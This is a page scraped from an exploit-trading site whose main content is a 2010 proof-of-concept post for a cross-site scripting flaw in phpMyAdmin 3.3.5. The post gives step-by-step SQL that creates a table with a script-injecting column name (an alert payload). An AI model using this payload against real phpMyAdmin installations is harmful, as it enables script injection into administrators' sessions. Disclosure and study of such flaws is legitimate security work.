0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
phpMyAdmin 3.3.5 XSS Vulnerability
[================================== phpMyAdmin 3.3.5 XSS Vulnerability ================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ########################################## 1 0 I'm Sid3^effects member from Inj3ct0r Team 1 1 ########################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Name : phpMyAdmin 3.3.5 XSS Vulnerability Date : August, 11 2010 Affected Versions: its older versions too :P Vendor Url : http://www.phpmyadmin.net/ Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com> special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr greetz to :www.topsecure.net ,trent Dillman,All ICW members and my friends :) luv y0 guyz ####################################################################################################### Description : phpMyAdmin is a free software tool written in PHP intended to handle the administration of MySQL over the World Wide Web. phpMyAdmin supports a wide range of operations with MySQL. The most frequently used operations are supported by the user interface (managing databases, tables, fields, relations, indexes, users, permissions, etc), while you still have the ability to directly execute any SQL statement. ############################################################################################################### Xploit: XSS Vulnerability The xss script gets executed by inserting the script in the "Field" section. Step 1 : Login to your phpmyadmin :) Step 2 : Create new database ... For example w00t Step 3 : Now create Table For example CREATE TABLE `r0ot` ( `id` int(8) NOT NULL auto_increment, `><script>alert(/inj3ct0r/)</script>` text NOT NULL, PRIMARY KEY (`id`) ) Step 4 : NOw execute your table :) you can check here for the latest version :) DEMO URL: http://demo.phpmyadmin.net/STABLE/ Screenshots : http://img208.imageshack.us/img208/4006/phpmyadmin.png ############################################################################################################### # 0day no more # Sid3^effects # 0day.today [2024-11-15] #